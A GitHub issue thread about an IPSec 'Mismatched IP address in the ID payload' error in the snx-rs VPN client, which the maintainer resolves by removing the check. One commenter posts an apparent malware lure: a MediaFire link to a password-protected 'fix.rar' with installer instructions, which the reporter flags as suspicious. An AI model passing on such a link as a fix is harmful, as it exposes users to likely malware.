### ISSUE TITLE
Mismatched IP address in the ID payload

### ISSUE THREAD

**Issue by insidesecurity-yhojann-aguilera** [ancwrd1/snx-rs#35]
When try connect to VPN says an error:

```bash
sudo ./snx-rs -m info -s ...;
Supported tunnel protocols:
	IPSec
	SSL
	L2TP
Available login types:
	vpn_Username_Password (Username Password)
sudo ./snx-rs --user-name ... --password ... --server-name ... --login-type vpn_Username_Password;
Error: Mismatched IP address in the ID payload, expected: ...
sudo ./snx-rs --user-name ... --password ... --server-name ... --login-type vpn_Username_Password;
Error: IPSec authentication failed, status: 0
```

What is `Mismatched IP address in the ID payload, expected` and how to see the requests? have a verbose option?

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by insidesecurity-yhojann-aguilera** [comment]
Thanks, but I'm suspicious. I don't see the source code for that and it has a completely generic name, so I get the impression that it could be malware.

**Comment by ancwrd1** [comment]
Hello, you can run it with `--log-level trace` to see the trace logs.
Perhaps the server sends a different address in the identity protection reply. I can disable this if it causes some issues.

**Comment by ancwrd1** [comment]
Should be fixed in version 2.4.1. I have removed this check, it seems to cause some issues with the users.
